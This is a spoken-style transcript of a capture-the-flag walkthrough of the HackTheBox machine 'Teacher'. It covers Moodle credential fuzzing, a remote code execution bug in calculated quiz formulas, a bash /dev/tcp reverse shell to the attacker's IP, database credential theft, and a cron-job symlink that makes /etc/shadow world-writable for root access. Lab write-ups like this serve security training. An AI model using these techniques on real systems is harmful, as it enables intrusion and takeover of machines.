What's going on YouTube? This is Ipsec, and we're going to be doing Teacher from HackTheBox, and I haven't really got much time to record this week, so we'll see how this video goes. I had some car troubles, which killed like 2 full nights of mine, and the last time I did this box was probably 2 to 3 months ago, around the time it got released. From what I remember, there is a website, you do something to get information on how to log into an application called Moodle, which is an open source school type thing where you can have teachers that create lessons plans and students that do the lesson plans and quizzes and get graded on it. And then the priv-esque was something along with the lines of a cron job. So let's just jump in and get to it. As always, we begin with an nmap with -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it teacher, and then the IP address, which is 10.10.10.153. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open. It is HTTP on port 80, and it says it's Apache HTTPD, and it's a Debian computer. We also have the title of the webpage as Black Hat High School, but let's go and check it out and see what is there. So go to 10.10.10.153, and we see just what looks like a normal web page. Before I spend too much time poking in, I do want to set up a GoBuster in the background because we always want to be doing some type of recon while we do some type of testing. So we'll do GoBuster-U for URL, paste the URL-W for word list, user share word list, dirbuster, directory list 23 medium.txt, -o for out file, and we'll just call this gobuster-root.log, and we'll set the threads to 50. I think the default is 10, and then go poke around the website. We see we already found images, CSS, manual, JS, and JavaScript. But let's see what is here. So the first thing I do is look around at the links and see if the extensions give away what type of web server it is. We just see the extensions as HTML, so we don't know if it's actually processing code or not. So let's go take a look at the source, and I press Ctrl-U to view the source. And here I'm looking at if I recognize any of the code that may be part of some type of CMS or static website builder or something along those lines. I do see an entry right here that says try to load images/5.png, and on error do a console.log. That's an F. So I'm going to go back to the web page. I'm going to press F12, and then looking at the console, I see it did print that is an F. If I go to students, events isn't a thing, teachers. So it looks like every time I go there, it is erroring out something. And if we look at this image, we see just Firefox can't display it. So if we grab this and go to download it, so if I go to my terminal and I do a curl on that, and then -o for out file, 5.png, and then we try to open it or look at what it is. So I'll just do like xxd on 5.png, which is a just hex editor, and I see it is not an image at all. It is just a picture. So if we look at the contents of it, we see, hi service desk, I forgot the last character of my password. The only part I remember is the cool teacher, I guess. Could you guys figure out what the last character is or just reset it? Thanks, Giovanni. So if you didn't want to find the image this way, you could also just go to like, let's say /images and look at all them and notice 5.png doesn't follow the same naming scheme and is also a lot smaller. There's no really good surefire way to find things like this. Unfortunately, it's kind of one of those silly CTF problems, but if you did normal enumeration, it sticks out like a sore thumb as you saw. So the next thing we have to do is find a way to log into the web app. So let's go back to our GoBuster and see if we have anything. So we found PHPMyAdmin and Moodle. So let's go check out what PHPMyAdmin is. It says A403. So if we go there, we get forbidden. We don't get any type of login page. So I'm just going to ignore this. It's probably going to be related to the server. If we really wanted to, we could send this over to Burp and then try some things to try to fool the server into we're coming from like localhost, which is probably allowed. So we can forward this And then we can say host. Let's send it to repeater first. We can put like host localhost, click go, and we still see 404. We could add the like x forwarded 4 header and put this localhost. See, this is still that. Every now and then you see this as like a proxy setting, and sometimes apps take it and set the variable. You can Google like x forwarded 4 bypasses and kind of get an idea exactly what that host header is, but I don't see any way to get into PHPMyAdmin, so I'm going to move on to the next one, which is Moodle. So let's go back to Firefox. We can turn burp off for now, and then go to /Moodle, and we get a dynamically created page. I'm going to hover over the algebra link, and I see view.php, so we know it's a PHP web server. Click this menu thing to see if there's anything. It doesn't look like it. And then we also see you are not logged in. So let's try logging in with the credentials we had. But before we do that, if we look at the actual message, it says he forgot the last character in his password, but it doesn't really give a username. So we have to figure out exactly what the username may be. So I'm going to click forgotten username and password and see if this tells us if the account is valid or not. Searching for IPsec, it just says the password should have been emailed to you, so we don't know if that's a valid username. Let's go back to the home page. I can click on the teacher name, and it wants us to log in. I'm going to try logging in as a guest to see if it gives us any more information, and guest can't access any user profiles. Looking at the calendar, maybe we can do something from here. It doesn't look like it. We can go back a few months because, well, this box was created a few months ago, and see if anything was ever in this calendar. It does not look like it. So don't know a good way to enumerate valid users or what their name may be. But we can probably guess it's Giovanni. Whether it's a capital or not, I don't know. And I don't see like a registration thing where we could register an account and see if accounts are case sensitive. So I'm just going to guess that it is case sensitive, and probably it's a capital G since that's what his display name shows. So I'm going to switch to use Burp Suite. I'm going to log in with Giovanni, and the password was the cool teacher with a special character at the end. I don't know if this is a just period at the end of the sentence or it's actually part of the password. I'm going to guess it's a period at the end of the sentence because he's putting punctuation at the end of everything else. So if it doesn't succeed, we will try again adding period and then a special character. So let us go back to Firefox, paste it without that period, and click login. Going to Burp Suite, go to the proxy tab, and we can send this one over to repeater. And we notice there is no cross-site request forgery tokens, also known as CSRF, which would stop us from just throwing this straight into wfuzz. So I'm going to copy the URL portion. We're going to go back and do wfuzz-h to get a list of all the arguments. We'll do wfuzz-u for URL, HTTP 10.10.10.153, paste the URL, and then we want to do -d for post data, and grab the actual post request, which is this, put it in single quotes, and then after the password, put fuzz in all caps because wfuzz is going to do a search and replace for fuzz with all caps with each line in this word list that we give it, and we'll give it user share sec list, and then fuzzing, and we have a bunch of lists here. I'm going to do the special chars.text because passwords normally end with a special character, and that should be it. So let's go. And then we're going to look at the number of characters in each request. And we can see right now, sending it a pound gives it a different number, which is 454. If we didn't know that, we could do --h capital, or --hh to hide characters, and then 440 and run through this again. So we see the password probably is the cool teacher with a hashtag at the end. So let's go back into Firefox. We can disable burp for now and put a # at the end of the password. And let's see. I probably want to do default for all URLs, which will disable the proxy. Is it going to log in? It's on default. Let's go to 10.10.10.153/Moodle. Let's do login. Giovanni, paste the password, and we get logged in. I'm not sure exactly what was going on before, but now we are logged in as Giovanni. So poking around at the site to see if there's anything there. The first thing I look at is private files. We can do like ALG and look around here. Don't really see too much, but I am going to do a search exploit for Moodle, and we see a bunch of various exploits. So the first thing to do is try to identify what version of Moodle is running. So to do that, I'm just going to go to GitHub Moodle and see if there's anything here that may help me. So looking down the list, looking at files, we do have a version.php. So I'm going to try going to that page first. And we see just a blank page. So it doesn't look like that actually loads. And I may check a few other files, may do like MD5 sums on JavaScript in this and get it that way. But I'm just going to see if anyone's published anything on how to do it. So I'm going to Google Moodle enumerate versions. And we see the first result is docs.moodle.com. And scrolling down, finding the version of Moodle if you are not an admin. And it looks like just look at the document number. So Moodle docs for this page. So if we scroll down, we see Moodle docs for this page. We go to the URL, and it brings us to Moodle 3.4. And we can see those docs aren't listed here. It's 36, 35, and 31, which is indication maybe that we'll have a vulnerability. But if we also Google like Moodle release 3.4, we'll see the release notes, and it was released 13 November 2017. So going back to a terminal window, I don't see anything for Moodle like 3.4. There is this Metasploit module, but it's not telling us what version it is for. And I'm just going to Google like Moodle exploit 3.4, 3.5. And I included 3.5 in that because that document is also missing. So Googling that brings us a few pages. We do have a exploit DB thing for Moodle 3.4.1. And we also have a blogs from ripstech.com. And I'm going to choose this before the Metasploit module because it's probably going to explain exactly how this works. And we can see in the question type calculated question type.php, there is a eval string to formula. And I'm guessing somewhere here we can actually control what formula is and pass data straight to eval. So that's what it looks like this exploit is. If we go back and look at the Metasploit module, what was it? Formula. I forgot exactly what the page was. Do we see where it's making a GET request to? So we're doing payload. It's doing a Python payload. And it's setting it to question.php, which looks like, yes, that is what we saw on the Ripstech blog. So let's try to exploit this manually. So going back over into the Moodle webpage, we know we have to create a quiz or something. What did Ripstech call it? Let's go back here. Yeah, we have to create a quiz. So let's go back and poke around Moodle to see if we can create a quiz. Going to the dashboard, we don't really have anything here. Go to courses, algebra, topic 1. It just goes down. There's nothing in these topics. If I look at this little gear, I can click this, and I'm looking at where like add quiz would be. We see turn editing on, so let's do that. And then now we have add an activity or resource. So clicking that, going to quiz, let's add this. And the name, let's do please subscribe. The description we can put and leave a comment. And then we got to kind of look at where we may see them do a eval command. And that was in the formula. So going through all these, I'm just looking for something that would be related to formula. Haven't really seen it yet. Grade boundary, if we could edit that, maybe, because we see percent. Go to common module, nothing. Restrict access. Completion, no. Tags. Competencies. Don't really see anything, so we will save and display. And then let's go edit the quiz to add questions. Let's see. Add a new question. And we have to find something that may have a formula. So I'm going to choose calculated because calculations generally have formulas. And we'll see where it goes. So question name. Did you subscribe? Question text. Of course, I'm talking about IPSEC on YouTube. And let's see, default mark, feedback, answers. Here we go, we got the formula here. So if we go back to this post and scroll down, we have the formula. So what they did was do 1.2, and if PHP evaluates 1.2, it'll do something. I actually don't know what this does. So let's see if we can verify that real quick. So I think that's PHP-A to enter interactive mode. And then we can just copy this. And then I think it's echo in PHP. And it says 1.2. If we do 1 plus 2, we see 3. So that's probably what I would have done to see if eval worked, because it's wrapped around eval, so it's just executing everything. But that being said, let's just try to copy what it says success and run it. So let's go back into calculated quiz, put this for the formula, and this get 0, it's just a parameter. I like doing request. And we can also change 0 to please subscribe, because that really shouldn't matter. That's just going to be the variable we pass in to get executed, because keep in mind, this whole answer thing is wrapped in eval. So we don't have to put the eval in there. We just have to put what code should get executed. And all this stuff is to bypass a filter, but it still should execute this. So feedback, yes, maybe? I wish I could do like yes, no, but yes should be the only answer to did you subscribe. So let's try save changes and see what happens. Did you subscribe? Yes. Test illegal format starting with the semicolon. So let's wait. What? I think that should be it. So it said starting with semicolon, we have an error. My confusion is mainly just coming from this blog post saying it's getting around some type of regular expression to make sure this is a valid formula. So I would have assumed this is needed. But let's just get rid of everything and close it off. Maybe if it errors out, we can do // 1.2, because I think // is a PHP comment. So maybe it just doesn't need the semicolons, but we can try this and see if it works. So save changes. And do we have an error message? One answer should have a score of 100%, so it's possible to get full marks for the question. Tolerance, grade, 100%. Save changes. So it looks like that has worked. The wildcards X will be substituted by numerical data. Sure. Okay, so now we have to, syntax error, expected end of file. Shoot, I went back. More information. Sorry, we can't be more helpful. That is awesome. So let's go back and see if we can, wait a second. I guess this is old stuff from either testing the machine or creating it. So if you go in the question bank, apparently, I just noticed this, there are old questions that I guess just didn't get cleaned up, because we can see June 2018 and we see my question April 2019. So we can cheat and look at what they did, see if this has the answer. So it is / and then X. So let's go back to mine and see. This box just became easier. That eliminated a lot of troubleshooting. So instead of doing / X, let's just try / 1.2. So we don't have any spaces, so I'm not going to introduce that bad character. Save changes. Next page. Syntax error. So let's try adding that X. We're just going to try to figure out where that error message is coming from. So go back. We can probably refresh this page. My Firefox is hung right now. Okay, so now let's go back down and we can try it with the X. Don't know why that X would do anything. So let's save changes. Click next page. And still a syntax error. So let's go back to the question bank. Open this in a new tab. Edit or did you subscribe? And they have, a semicolon. So I guess that previous error message was because we ended with a semicolon, which kind of makes sense if you're thinking about like a regular expression looking for a valid thing. So let's leave this 1.2 back on and put the semicolon before that, because there's probably no reason for formula and with semicolon. So maybe that's why it had said bad syntax. So go to next page. And still an error message. So let's go back a few times and we're just going to copy what we have. So let's copy this. Go to a terminal. Let's do a new pane, vtemp, and compare the two. Because this one should probably work. So what do we have? We could change this back to a get, but I want to leave it like this. Okay, so we added the semicolon and left it at 1.2 like this and got a syntax error. So one thing I'm going to do, and let's see, this will be right here. So 1, 2, 3, 4, 5, 6, 2F. And then, 60. So what I was doing here is making sure the backticks are the same and not some weird version of Unicode. So let us change this one to be just semicolon backslash / X. We had 1.2 before. And let's see if this one works, because that semicolon looks like it's the only difference. And there we go. We don't have an error message anymore. And if we send this request over to Burp, let's make sure intercept is on and not intercepting anything. Okay, refresh. Send it to repeater. And let's try adding and please subscribe is equal to, we'll do ping plus, because it's URL encoding, 10.10.14.3, And before that, we want probably -n plus 1 to only ping one time so we don't start a lot of pings. We can do tcp dump -i eth0 icmp. And I normally like doing -n, and it's not eth0, it is ton0 for a VPN adapter. But I like doing -n to not do DNS resolution. And then click go. And we don't see a ping. So let's see. If we do /bin/ping, we get a delay. If config ton0, and our IP is correct at 10.10.14.3. Maybe this isn't how we trigger it. Oh. There we go. It was that -n. Maybe -n is Windows and I wanted -c. But let's see. Ping -h. And let's see. -c is count. -n must be Windows. And that's why I always like having some type of argument, because now we have the server constantly pinging us. And sometimes you can actually hang the server if it's not a threaded web server, because this child process will just stay alive. So let's see if we can do pkill for process kill plus ping. Click go. And we can't. Did we hang the server? Please say we did not. Go. And I think we did. I'm going to pause the video and we'll give this like 2 or 3 minutes to see if the server comes back to us. But I don't think the PHP piece is threaded, so we may have just hung this. Let's go back to Moodle. Yeah, we can't load anything. So should have tried -c before getting rid of -n, but I'll just give this some time to see if it times out. If not, then I'll just resume the video here and pretend we did -c instead of -n. So I rebooted the box. We can see it works. So we can also see we're no longer getting pings. Let's do this the correct way and then get a shell. So let's go. Was this where we had ping? Was this where we had ping? I'm not sure exactly where we had typed ping. Let's do and please subscribe is equal to ping plus -c plus 1 for count 10.10.14.3. I don't know why I did -n before, but let's just click go. And we have 1 ping. Or maybe that was 2 pings. Request, reply, but either way, it's not a constant loop of pinging, so the server comes back to us and it's not hung. So let's do a reverse shell, and then we will begin with the privesc. So let's do, what was it? bash-i that dev tcp 10.10.14.3 / we'll do 9001. And then it is, I want to say 2 and 1 like that. Let's go Google pentest monkey and make sure this is the correct shell. So pentest monkey, reverse shell cheat sheet, and make sure all those numbers are correct. 0 and 1. So 0 and 1. That looks good. So let's copy Control-U to URL encode it. Go back to our terminal. netcat lvnp 9001. Click go. Don't get a shell, so I'm going to do bash space -c space single quote and end this in a single quote. Click go. And we get a shell. So python-c import pty.spawn bin bash. Then we can background it with Control-Z and do stty raw minus echo, and then hit FG enter. And now we got a decent shell to Moodle. So the first thing I normally do whenever I pop a web server is to look at where the database config is and poke around the database. So let's just ls grep for config, and we see config.php. So let's cat that, and we can see the database is MySQL, database name's Moodle, user's root, and password is welcome1. So do MySQL-u root -d for database, Moodle, and -p. Maybe it's -D for database. And the password, WELKOM1 exclamation point. Let's copy and paste because I probably typoed that. There we go. We're in Moodle. So we're going to do show tables and see all the tables. I'm going to search this for like user private key. Let's see. User last access. Maybe MDL user or password history would be good. But let's just try user first. And we can do describe MDL user to show what rows are in this. And we probably want something with name. So username and password. So let's do select ID, username, password from it's MDL underscore users, I believe. Was it user or users? User. Enter. And we get a few hashes. So we have a bunch of bcrypt hashes, and then this one hash that looks like it's MD5. So let's do echo-n, wc-c to count it, 32. That is going to be an MD5 sum. We could go to hashcat to crack this, but most MD5s you can just Google and get it. And that hash is, it said, hashes for expelled. So Giovannibak is expelled. So if we exit MySQL and do a cat etc passwd, we do have a Giovanni user. So we can do su-Giovanni, try expelled, and we get access to his user. So we can do wc-c, user.text. We can read that, 33 characters. That is MD5 sum and a line break. And then there is this directory called work. So let's go take a look at what work is. We got courses and temp. So I'm just going to do a find.-ls to get an idea what this is. And it just has a list of the courses. So we kind of have to figure out exactly what's going on here. Let's do a ls on etc cron.star to see if there's anything out of the ordinary. We have a cron for PHP. We cat etc cron.d on PHP. There's nothing there, just a session cleanup thing. And the reason why I'm focusing at this is because this is today's date. So we know something's going on here, probably some type of cron, because it looks like it's going every minute. Since if I look at the date, it is saying it is 0029, and up there was 0027. So if we do lsla on temp, find .-ls, we still see things are on April 29th, or 20th. I'm going to check out what etc cron tab is to see if anything is there. We don't have any crons, so most likely the cron is somewhere in var-spool, cron tabs, and then I'd guess root, since we have root creating these directories, but we can't read root, so we have to use like a program to identify processes that is running. So let's go and grab GoSpy. So let's do locate GoSpy, and I thought I had it on my box. Maybe I don't. I swear I've used this before. Let's try GoSpy again. I do not have it. So let's go GitHub GoSpy, and download this. This is just a good process monitor. At least I believe it's goes by. Let's look at what the README says. Goes by monitor calls to a function. That's not it. Go PSPY? I forget what the program's called now. Go program monitor process Linux. Maybe it's just PSPY. So let's try PSPY go. PSPY GitHub. Locate PSPY. Locate PSPY. Nope, that's not it. I think it was actually, I used it in curling, so maybe I have it in curling's directory. www PSPY. I think that's it. PSPY GitHub. There we go. This is it. So many tools, remembering the names can be tough. So let's just do a cd opt git clone. Oh, do I have it? I do have it. cd pspy, and then find.grep pspy. Let's do go os equals Linux, go arc equals probably 64-bit. It is AMD 64, and then go build. Go git and get each of these. I'll have to go back in curling to see exactly how I grab this. Maybe there's a release and I just downloaded it. And my Kali VM's hung again. Something's going on with my Kali VM today. That's the second time, or maybe third time it's hung. So it looks like my go git crashed, but I closed Firefox, so let's try this again. And there we go. Now go git worked. So Firefox was eating all my memory, it looks like. So let's try this go os command again, and it has built. So now we have PSPY here. We can move PSPY to HTB boxes teacher, and then go into that directory, and then make dir dub, and then move PSPY to dub. Going over to netcat, we still have our shell, so let's do a cd/dev shm, and then curl 10.10.14 3 / we need put 8000 / pspy -o pspy, and then start that web server. So python-m simple http server, and then run this. Curl's not found. Let's do wget 10.10.14 3 port 8000 pspy. It is now downloaded. We can do chmod plus x pspy, chmod plus x pspy. And I was looking for the color to show it's executable. It's good. We can execute this, and now it is watching processes. So we should see a new one pop up as the crons run. And there we go. We have cron running, and then we have bin sh-c user bin backup.sh. So let's take a look at what that file is, lsla on it. We can read it. So let's look at it, and let's just do a cat. There we go. So now I can clear the screen, and I can cat it. So what we're doing is going into cd home Giovanni work, and then it is running the command tar-czvf temp backup courses.tar.gz to courses, and then going into temp, and then xf would be extract the file, and chmod everything to 777. So what we can do is if we remove temp, rm-rf on temp, we can probably do a symlink. So Etsy shadow into home Giovanni work temp. So now when it does this tar command, it's going to tar a symlink, which points it to Etsy shadow, and then it's going to chmod 777 Etsy shadow. So if we do lsla, we do see Etsy shadow now has permissions of 777. So we can edit this and change the root password to be what Giovanni's is. So let's cat Etsy shadow grep Giovanni. And we will copy this over top of the root's password. Probably should have backed up the shadow before doing this, but oh well. So let's paste this in. And now we should be able to SU, and then Giovanni's password I think was expelled, and now we are root. So that is the box. Hope you guys enjoyed it. Take care, and I will see you all next week.